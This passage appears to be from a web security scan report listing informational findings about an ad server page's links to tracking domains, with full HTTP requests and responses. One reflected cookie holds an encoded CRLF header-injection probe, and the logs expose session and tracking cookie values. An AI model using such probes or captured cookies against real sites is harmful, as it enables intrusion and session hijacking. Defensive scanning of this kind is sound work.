The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.371428&creativeID=147856&message=eJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-15.html?cb=0.03344764839857817&keyword=smh/businessinnovations_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; ses15=12338^11&12590^9; ses2=12338^18&12590^7

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:39 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:39 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:31:39 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^91&12590^88; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62900; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=fa8130bd-b723-4a80-b003-dfcb439ce917"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.371428&creativeID=147856&message=eJwdjDkOhTAQQ6.CpibSTJxlwm0IS4XoqL7.3XGo_J5k.yeALFPzWDBPgkhxwHyYUeRc3aB9D71GhLS6hq6KsJ9bT2jb0azKmI5yzVE_Gz.NmZlJ4cREvJ_rIhaisZrL_wXvwxtb&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.55. http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-15.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-15.html?cb=0.03344764839857817&keyword=smh/businessinnovations_other

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.371428&creativeID=147856&message=eJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-15.html?cb=0.03344764839857817&keyword=smh/businessinnovations_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^11&12590^9; rdk=7725/12338; rdk2=0; ses2=12338^19&12590^7; csi2=3152310.js^1^1315405364^1315405364&3165011.js^3^1315404895^1315405144&3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:31:46 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:31:46 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk15=04e8588ddd34dd9206cdecba9; expires=Wed, 07-Sep-2011 15:31:46 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses15=12338^86&12590^96; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=62893; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...

<script type="text/javascript" src="http://cdn4.eyewonder.com/cm/js/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--%26redirectURL%3D">
</script>
<noscript>
<a href="http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481">
<img src="http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-46?mpt=50234679-488b-4d23-aea0-c3ab79288481"
alt="Click Here" border="0">
</a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.371428&creativeID=147856&message=eJwVjDEOAjEQA79y2ppIyXqTOPwmB3QnOirE3_FWnpFsfw2w.7HoA7fD4BICjWlNYr06YsxVgjxLPB1lv3YtD.xzLieDzXKa5dm9zrT8WcqujAoKQ_j.XJdwCJuqffz.qIEagA--&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.56. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.8627023494336754&keyword=smh/business_home

The response contains the following links to other domains:

http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26655621&ahcid=1862305&bimpd=qvey7M4dbcYCqAn2iG9ztyN0s9aRRFcAB46FGFRJARXDa-9_1NSluyZs9V4lcxbvB5QG7MCVk9j9840Pj41gG78wvAhJVp5vH1605NNaPKhH3Hc40cPaTNqetb7TxZG_bvlU9U7atshvMo03rXjmCyTpNA14uRb30ZB3drhT7b5A1kODxXS6UkRbafQ_vua1ON8YzvP9i1NBAzlvC2Of7Dbw6rj-zkxgkYAI4PHz3qrnRnblngZQJy2wx6j9m09DL435c4XDwTkoXZsLUx725ZWy23fsNn_X0Jk-40K2KMDFKwUaH5iO4gu4sPKu6NihyfNOMGciyyoTxTjKJqxYc6FnkRqrBo2cLNPgwHre5FHs93gaSC7FTPyIPLZP8ukgBS9Tk7NRROL2OtpwtUVEZFr7t6tkFX4P1ZTWWY9-1gYc3d8dAuX1XMQbErAQcZYT-2wLG1v0jNNGvLFwPVI463aoBUsWtsZZqH0CVvFPBCo9WQ4wWLxz2Pt3Dul33WxyvCgee3_397yfjtYKXTfjBs4LYADIz4C1UC24QYs7MN6Uwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhQtqmEr3HksrlmkNmn1jt-0EP05YAqhV5qAFyI7rIpPH4m44AHqTc8Trnv4qrQ2pxNW_m6IzsOng0XvdRcMF2unY8wZzXZwCKnnfDdEHfhOIgCchPaU_67i3SPEJWYvjs-0uT3Woquzk117HiJb6nAyHJvsAP9bFmqWc6-PMrG05VmE95kT6f-NQ_XOtIrXbJYCTwcVHvA9ZdSrJmtTmdeFw3pucVEdD-NlECFL3UA9yCHhqtsF3JDqz7AN1nNSARz3bdu7qLIRU2DxjKSbYCxc&acp=34DF183B07E82D56&rtbacid=019bde7d8543e9a90f68a4460c7be19f9e13d5ab
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-2.html?cb=0.8627023494336754&keyword=smh/business_home HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://www.smh.com.au/business
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; csi2=3151648.js^2^1315404875^1315404931&3196945.js^2^1315404874^1315404931&3165011.js^2^1315404895^1315404918&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061; rdk2=0; ses2=12338^10&12590^5; rdk=7856/12590; rdk15=0; ses15=12338^7&12590^6

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:19:57 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:19:57 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=1; expires=Wed, 07-Sep-2011 15:19:57 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=65721%0d%0ad9a58474786^&12338^1&12590^2; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63602; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2555

<html>
<head>
<meta http-equiv="Pragma" content="no-cache">
<meta http-equiv="expires" content="0">
<style type="text/css"> body {margin:0px; padding:0px;} </style>
<script type="tex
...[SNIP]...
<body>

<script src='http://ad.turn.com/server/ads.js?pub=5766351&cch=5766918&code=5766926&l=728x90&aid=26655621&ahcid=1862305&bimpd=qvey7M4dbcYCqAn2iG9ztyN0s9aRRFcAB46FGFRJARXDa-9_1NSluyZs9V4lcxbvB5QG7MCVk9j9840Pj41gG78wvAhJVp5vH1605NNaPKhH3Hc40cPaTNqetb7TxZG_bvlU9U7atshvMo03rXjmCyTpNA14uRb30ZB3drhT7b5A1kODxXS6UkRbafQ_vua1ON8YzvP9i1NBAzlvC2Of7Dbw6rj-zkxgkYAI4PHz3qrnRnblngZQJy2wx6j9m09DL435c4XDwTkoXZsLUx725ZWy23fsNn_X0Jk-40K2KMDFKwUaH5iO4gu4sPKu6NihyfNOMGciyyoTxTjKJqxYc6FnkRqrBo2cLNPgwHre5FHs93gaSC7FTPyIPLZP8ukgBS9Tk7NRROL2OtpwtUVEZFr7t6tkFX4P1ZTWWY9-1gYc3d8dAuX1XMQbErAQcZYT-2wLG1v0jNNGvLFwPVI463aoBUsWtsZZqH0CVvFPBCo9WQ4wWLxz2Pt3Dul33WxyvCgee3_397yfjtYKXTfjBs4LYADIz4C1UC24QYs7MN6Uwz1lVaf0RwqnshRhX3_tvfBz5xDsVEqchMpjM7fNhQtqmEr3HksrlmkNmn1jt-0EP05YAqhV5qAFyI7rIpPH4m44AHqTc8Trnv4qrQ2pxNW_m6IzsOng0XvdRcMF2unY8wZzXZwCKnnfDdEHfhOIgCchPaU_67i3SPEJWYvjs-0uT3Woquzk117HiJb6nAyHJvsAP9bFmqWc6-PMrG05VmE95kT6f-NQ_XOtIrXbJYCTwcVHvA9ZdSrJmtTmdeFw3pucVEdD-NlECFL3UA9yCHhqtsF3JDqz7AN1nNSARz3bdu7qLIRU2DxjKSbYCxc&acp=34DF183B07E82D56&rtbacid=019bde7d8543e9a90f68a4460c7be19f9e13d5ab'></script><img src="http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment" style="display: none;" border="0" height="1" width="1" alt="Quantcast"/><script defer="defer" type="text/javascript">
...[SNIP]...
</script>
<img src="http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01" style="display: none;" border="0" height="1" width="1" alt=""/><DIV STYLE="height:0px; width:0px; overflow:hidden">
...[SNIP]...

14.57. http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://optimized-by.rubiconproject.com
Path:	/a/7856/12590/22782-2.html

Issue detail

The page was loaded from a URL containing a query string:

http://optimized-by.rubiconproject.com/a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other

The response contains the following links to other domains:

http://cdn4.eyewonder.com/cm/js/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade&mpvc=http%3A%2F%2Fg.ca.bid.invitemedia.com%2Fpixel%3FreturnType%3Dredirect%26key%3DClick%26message%3DeJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt%26redirectURL%3D
http://cdn4.eyewonder.com/cm/nb/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade
http://g.ca.bid.invitemedia.com/pixel?returnType=redirect&key=Click&message=eJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt&redirectURL=http://cdn4.eyewonder.com/cm/nc/12963-135748-32613-45?mpt=f8d7f130-eb44-4d57-a129-06e19ec49ade
http://g.ca.bid.invitemedia.com/rubicon_imp?returnType=image&key=AdImp&cost=0.678878&creativeID=147857&message=eJwVjDEOgDAMA7.CMlOpadI24TeFlgmxMSH.jjv5TrL9kghti1sqsi4kCWIibApjCJ3W68kSw9hVg_ZcQ.PkIZbBPg711gfN6SzXnGKdNn8cmZEaxYAKvJ_rAhYgo5r5.wHzDxtt&managed=false
http://pixel.invitemedia.com/data_sync?partner_id=77&exchange_id=9
http://pixel.quantserve.com/pixel/p-e4m3Yko6bFYVc.gif?labels=NewsAndReference,Entertainment
http://trgca.opt.fimserve.com/fp.gif?pixelid=287-036699&diresu=154e62c97432177b6a4bcd01

Request

GET /a/7856/12590/22782-2.html?cb=0.5008782960940152&keyword=smh/news_other HTTP/1.1
Host: optimized-by.rubiconproject.com
Proxy-Connection: keep-alive
Referer: http://news.smh.com.au/breaking-news-national/wa-labor-launches-another-bushfire-probe-20110907-1jx2h.html
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: put_1994=vf1kj11kp2en; put_2249=CAESEGMUSetziKiEuzwBhcLJxAU; put_2046=WX9qald2TXhCBmNbCwp9WwZUaXsQdAFCDVliU1tKZA%3D%3D; put_1986=6422714091563403120; put_2146=n4tx19dbice3prpg7887b1ymgzfc6iit; ruid=154e62c97432177b6a4bcd01^5^1315404849^840399722; rsid=FcGERCD9s4JUW/TrcU4Dz61qa66Y1k1ire2YJBmN8SN4G8GheDmUSJ4NHOc49cA03rZJzx16pB3Ud4wsGOQ2PP8TzZUxGDmBad2r6N25AKxdPo9e; put_2081=OO-00000000000000000; put_1430=f0be7f74-7052-4a09-8aa0-ca59d82b3888; put_1523=NPgmRuqc1g7o5ImOP5HZYnndqUL92n1F; put_1185=2863298321806118365; put_1197=3620501663059719663; put_2132=439524AE8C6B634E021F5F7802166020; put_2271=DUSYkUQpjy1LEYeYEnMS6srZRiE; put_2025=f9bdca69-e609-4297-9145-48ea56a0756c; put_2100=usr3fe3ac8db403a568; au=GSAE3LG5-KKTN-10.208.77.156; put_2245=b6ae888c-d95b-11e0-b096-0025900e0834; rpb=7908%3D1%264940%3D1%267751%3D1%265364%3D1%267259%3D1%267249%3D1%266432%3D1%265671%3D1%264210%3D1%264212%3D1%267935%3D1%266073%3D1%267727%3D1%265852%3D1; put_2101=f31d0c43-cd91-4caf-ae01-86754c3f8535; cd=false; lm="7 Sep 2011 14:14:54 GMT"; csi15=3188306.js^1^1315404900^1315404900&3151650.js^1^1315404889^1315404889&3196947.js^1^1315404889^1315404889&3186719.js^1^1315404875^1315404875&3212309.js^1^1315404855^1315404855&3199969.js^1^1315404852^1315404852&1300434.js^11^1315322155^1315325244&1295121.js^3^1315321144^1315321847&2553663.js^5^1315321038^1315321537&1295156.js^3^1315320939^1315321025; ses15=12338^5&12590^4; rdk=7725/12338; ses2=12338^7&12590^2; csi2=3165011.js^2^1315404895^1315404918&3151648.js^1^1315404875^1315404875&3196945.js^1^1315404874^1315404874&3199967.js^1^1315404849^1315404849&1295153.js^1^1315321061^1315321061

Response

HTTP/1.1 200 OK
Date: Wed, 07 Sep 2011 14:18:34 GMT
Server: RAS/1.3 (Unix)
Set-Cookie: rdk=7856/12590; expires=Wed, 07-Sep-2011 15:18:34 GMT; max-age=60; path=/; domain=.rubiconproject.com
Set-Cookie: rdk2=0; expires=Wed, 07-Sep-2011 15:18:34 GMT; max-age=10; path=/; domain=.rubiconproject.com
Set-Cookie: ses2=12338^29&12590^7; expires=Thu, 08-Sep-2011 05:59:59 GMT; max-age=63685; path=/; domain=.rubiconproject.com
Cache-Control: no-cache, no-store, max-age=0, must-revalidate
Pragma: no-cache
Expires: Wed, 17 Sep 1975 21:32:10 GMT
Content-Type: text/html
Content-Length: 2940

<html>
